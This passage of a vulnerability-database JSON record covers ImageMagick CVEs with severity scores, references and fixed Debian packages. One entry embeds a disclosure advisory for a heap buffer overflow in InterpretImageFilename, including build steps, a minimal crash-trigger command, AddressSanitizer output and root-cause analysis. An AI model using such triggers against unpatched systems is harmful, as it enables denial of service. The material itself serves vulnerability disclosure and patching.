"2026-04-13T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.02817", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.02826", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.02943", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-28690" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28690", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28690" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-7h7q-j33q-hvpf", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-10T15:58:08Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-7h7q-j33q-hvpf" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28690", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28690" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445887", "reference_id": "2445887", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445887" }, { "reference_url": "https://github.com/advisories/GHSA-7h7q-j33q-hvpf", "reference_id": "GHSA-7h7q-j33q-hvpf", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-7h7q-j33q-hvpf" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026115?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1068118?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u8" } ], "aliases": [ "CVE-2026-28690", "GHSA-7h7q-j33q-hvpf" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-54da-fzyt-4ud2" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/28920?format=api", "vulnerability_id": "VCID-5s8n-dfjf-ruey", "summary": "ImageMagick has a Heap Buffer Overflow in InterpretImageFilename\n# Heap Buffer Overflow in InterpretImageFilename\n\n## Summary\nA heap buffer overflow was identified in the `InterpretImageFilename` function of ImageMagick. The issue stems from an off-by-one error that causes out-of-bounds memory access when processing format strings containing consecutive percent signs (`%%`).\n\n## Environment\n- **OS**: Arch Linux (Linux gmkhost 6.14.2-arch1-1 # 1 SMP PREEMPT_DYNAMIC Thu, 10 Apr 2025 18:43:59 +0000 x86_64 GNU/Linux (GNU libc) 2.41)\n- **Architecture**: x86_64\n- **Compiler**: gcc (GCC) 15.1.1 20250425\n\n## Reproduction\n\n### Build Instructions\n```bash\n# Clone the repository\ngit clone https://github.com/ImageMagick/ImageMagick.git\ncd ImageMagick\ngit reset --hard 8fff9b4f44d2e8b5cae2bd6db70930a144d15f12\n\n# Build with AddressSanitizer\nexport CFLAGS=\"-fsanitize=address -g -O1\"\nexport CXXFLAGS=\"-fsanitize=address -g -O1\"\nexport LDFLAGS=\"-fsanitizer=address\"\n./configure\nmake\n\n# Set library path and trigger the crash\nexport LD_LIBRARY_PATH=\"$(pwd)/MagickWand/.libs:$(pwd)/MagickCore/.libs:$LD_LIBRARY_PATH\"\n./utilities/.libs/magick %% a\n```\n\n### Minimum Trigger\n```bash\n./utilities/.libs/magick %% [any_output_filename]\n```\n\n## Crash Analysis\n\n### AddressSanitizer Output\n```\n$ ./utilities/.libs/magick %% a\n=================================================================\n==2227694==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7037f99e3ad3 at pc 0x741801e81a17 bp 0x7ffd22fa4e00 sp 0x7ffd22fa45b8\nREAD of size 1 at 0x7037f99e3ad3 thread T0\n #0 0x741801e81a16 in strchr /usr/src/debug/gcc/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:746\n #1 0x7418013b4f06 in InterpretImageFilename MagickCore/image.c:1674\n #2 0x7418012826a3 in ReadImages MagickCore/constitute.c:1040\n #3 0x741800e4696b in CLINoImageOperator MagickWand/operation.c:4959\n #4 0x741800e64de7 in CLIOption MagickWand/operation.c:5473\n #5 0x741800d92edf in ProcessCommandOptions MagickWand/magick-cli.c:653\n #6 0x741800d94816 in MagickImageCommand MagickWand/magick-cli.c:1392\n #7 0x741800d913e4 in MagickCommandGenesis MagickWand/magick-cli.c:177\n #8 0x5ef7a3546638 in MagickMain utilities/magick.c:162\n #9 0x5ef7a3546872 in main utilities/magick.c:193\n #10 0x7417ff53f6b4 (/usr/lib/libc.so.6+0x276b4) (BuildId: 468e3585c794491a48ea75fceb9e4d6b1464fc35)\n #11 0x7417ff53f768 in __libc_start_main (/usr/lib/libc.so.6+0x27768) (BuildId: 468e3585c794491a48ea75fceb9e4d6b1464fc35)\n #12 0x5ef7a3546204 in _start (/home/kforfk/workspace/fuzz_analysis/saigen/ImageMagick/utilities/.libs/magick+0x2204) (BuildId: 96677b60628cf297eaedb3eb17b87000d29403f2)\n\n0x7037f99e3ad3 is located 0 bytes after 3-byte region [0x7037f99e3ad0,0x7037f99e3ad3)\nallocated by thread T0 here:\n #0 0x741801f20e15 in malloc /usr/src/debug/gcc/gcc/libsanitizer/asan/asan_malloc_linux.cpp:67\n #1 0x7418013e86bc in AcquireMagickMemory MagickCore/memory.c:559\n\nSUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/image.c:1674 in InterpretImageFilename\nShadow bytes around the buggy address:\n 0x7037f99e3800: fa fa 07 fa fa fa 00 fa fa fa fd fa fa fa fd fa\n 0x7037f99e3880: fa fa 07 fa fa fa 00 fa fa fa fd fa fa fa fd fa\n 0x7037f99e3900: fa fa 07 fa fa fa 00 fa fa fa fd fa fa fa fd fa\n 0x7037f99e3980: fa fa 07 fa fa fa 00 fa fa fa fd fa fa fa fd fa\n 0x7037f99e3a00: fa fa 07 fa fa fa fd fa fa fa fd fa fa fa 00 04\n=>0x7037f99e3a80: fa fa 00 04 fa fa 00 00 fa fa[03]fa fa fa 03 fa\n 0x7037f99e3b00: fa fa 00 01 fa fa fa fa fa fa fa fa fa fa fa fa\n 0x7037f99e3b80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x7037f99e3c00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x7037f99e3c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x7037f99e3d00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\nShadow byte legend (one shadow byte represents 8 application bytes):\n Addressable: 00\n Partially addressable: 01 02 03 04 05 06 07 \n Heap left redzone: fa\n Freed heap region: fd\n Stack left redzone: f1\n Stack mid redzone: f2\n Stack right redzone: f3\n Stack after return: f5\n Stack use after scope: f8\n Global redzone: f9\n Global init order: f6\n Poisoned by user: f7\n Container overflow: fc\n Array cookie: ac\n Intra object redzone: bb\n ASan internal: fe\n Left alloca redzone: ca\n Right alloca redzone: cb\n==2227694==ABORTING\n```\n\n## Root Cause Analysis\nThe first command line argument is interpreted as `MagickImageCommand`:\nhttps://github.com/ImageMagick/ImageMagick/blob/8fff9b4f44d2e8b5cae2bd6db70930a144d15f12/utilities/magick.c#L83\n```c\nconst CommandInfo\n MagickCommands[] =\n {\n MagickCommandSize(\"magick\", MagickFalse, MagickImageCommand),\n```\n\nIt is invoked here:\nhttps://github.com/ImageMagick/ImageMagick/blob/8fff9b4f44d2e8b5cae2bd6db70930a144d15f12/MagickWand/magick-cli.c#L220\n```c\nstatus=command(image_info,argc,argv,&text,exception);\n```\n\nThe execution then follows this path:\n- https://github.com/ImageMagick/ImageMagick/blob/8fff9b4f44d2e8b5cae2bd6db70930a144d15f12/MagickWand/magick-cli.c#L1387\n- https://github.com/ImageMagick/ImageMagick/blob/8fff9b4f44d2e8b5cae2bd6db70930a144d15f12/MagickWand/magick-cli.c#L586\n- https://github.com/ImageMagick/ImageMagick/blob/8fff9b4f44d2e8b5cae2bd6db70930a144d15f12/MagickWand/magick-cli.c#L419\n- https://github.com/ImageMagick/ImageMagick/blob/8fff9b4f44d2e8b5cae2bd6db70930a144d15f12/MagickWand/operation.c#L5391\n- https://github.com/ImageMagick/ImageMagick/blob/8fff9b4f44d2e8b5cae2bd6db70930a144d15f12/MagickWand/operation.c#L5473\n- https://github.com/ImageMagick/ImageMagick/blob/8fff9b4f44d2e8b5cae2bd6db70930a144d15f12/MagickWand/operation.c#L4959\n- https://github.com/ImageMagick/ImageMagick/blob/8fff9b4f44d2e8b5cae2bd6db70930a144d15f12/MagickCore/constitute.c#L1009\n- https://github.com/ImageMagick/ImageMagick/blob/8fff9b4f44d2e8b5cae2bd6db70930a144d15f12/MagickCore/constitute.c#L1039\n- https://github.com/ImageMagick/ImageMagick/blob/8fff9b4f44d2e8b5cae2bd6db70930a144d15f12/MagickCore/image.c#L1649\n- https://github.com/ImageMagick/ImageMagick/blob/8fff9b4f44d2e8b5cae2bd6db70930a144d15f12/MagickCore/image.c#L1674\n\nThe execution eventually reaches `InterpretImageFilename` and enters a loop. The `format` variable here is `\"%%\"`. At this point, it is safe to access `*(format + 2)` but not safe to access `*(format + 3)`.\n\n```c\nfor (p=strchr(format,'%'); p != (char *) NULL; p=strchr(p+1,'%'))\n{\n q=(char *) p+1;\n if (*q == '%')\n {\n p=q+1;\n continue;\n }\n```\n\nThe first `strchr` call returns a pointer equal to `format` and assigns it to `p`. Then `q` is initialized with `p + 1` (`format + 1`), and `*q` is `'%'`, so the code enters the if branch. Here, `p` is reassigned to `q + 1` (`format + 2`).\n\nIn the next iteration, `p + 1` (`format + 3`) is passed to `strchr`, and when `strchr` accesses it, this causes an out-of-bounds read.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-53014.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-53014.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-53014", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.15844", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.15795", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.1571", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.1591", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17693", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.1774", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17786", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17768", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17596", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17685", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17647", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17639", "published_at": "2026-04-16T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-53014" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-53014", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-53014" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.7.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.7.0" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick6/commit/79b6ed03770781d996d1710b89fbb887e5ea758a", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/79b6ed03770781d996d1710b89fbb887e5ea758a" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/29d82726c7ec20c07c49ba263bdcea16c2618e03", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/29d82726c7ec20c07c49ba263bdcea16c2618e03" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-hm4x-r5hc-794f", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-14T18:26:03Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-hm4x-r5hc-794f" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53014", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53014" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1109339", "reference_id": "1109339", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1109339" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2379941", "reference_id": "2379941", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2379941" }, { "reference_url": "https://github.com/advisories/GHSA-hm4x-r5hc-794f", "reference_id": "GHSA-hm4x-r5hc-794f", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-hm4x-r5hc-794f" }, { "reference_url": "https://usn.ubuntu.com/7728-1/", "reference_id": "USN-7728-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7728-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2025-53014", "GHSA-hm4x-r5hc-794f" ], "risk_score": 1.6, "exploitability": "0.5", "weighted_severity": "3.3", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-5s8n-dfjf-ruey" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/21069?format=api", "vulnerability_id": "VCID-5uyd-bv33-h7g1", "summary": "ImageMagick: Heap overflow in sun decoder on 32-bit systems may result in out of bounds write\nAn Integer Overflow vulnerability exists in the sun decoder. On 32-bit systems/builds, a carefully crafted image can lead to an out of bounds heap write.\n\n```\n=================================================================\n==1967675==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf190b50e at pc 0x5eae8777 bp 0xffb0fdd8 sp 0xffb0fdd0\nWRITE of size 1 at 0xf190b50e thread T0\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25897.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25897.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25897", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00022", "scoring_system": "epss", "scoring_elements": "0.06044", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00022", "scoring_system": "epss", "scoring_elements": "0.06013", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00062", "scoring_system": "epss", "scoring_elements": "0.19194", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00062", "scoring_system": "epss", "scoring_elements": "0.19248", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00062", "scoring_system": "epss", "scoring_elements": "0.19237", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00062", "scoring_system": "epss", "scoring_elements": "0.19162", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00062", "scoring_system": "epss", "scoring_elements": "0.19153", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00062", "scoring_system": "epss", "scoring_elements": "0.19295", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00062", "scoring_system": "epss", "scoring_elements": "0.1929", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00062", "scoring_system": "epss", "scoring_elements": "0.1939", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00062", "scoring_system": "epss", "scoring_elements": "0.19441", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00062", "scoring_system": "epss", "scoring_elements": "0.19158", "published_at": "2026-04-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25897" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25897", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25897" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/23fde73188ea32c15b607571775d4f92bdb75e60", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/23fde73188ea32c15b607571775d4f92bdb75e60" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-6j5f-24fw-pqp4", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T15:23:43Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-6j5f-24fw-pqp4" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25897", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25897" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442098", "reference_id": "2442098", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442098" }, { "reference_url": "https://github.com/advisories/GHSA-6j5f-24fw-pqp4", "reference_id": "GHSA-6j5f-24fw-pqp4", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": 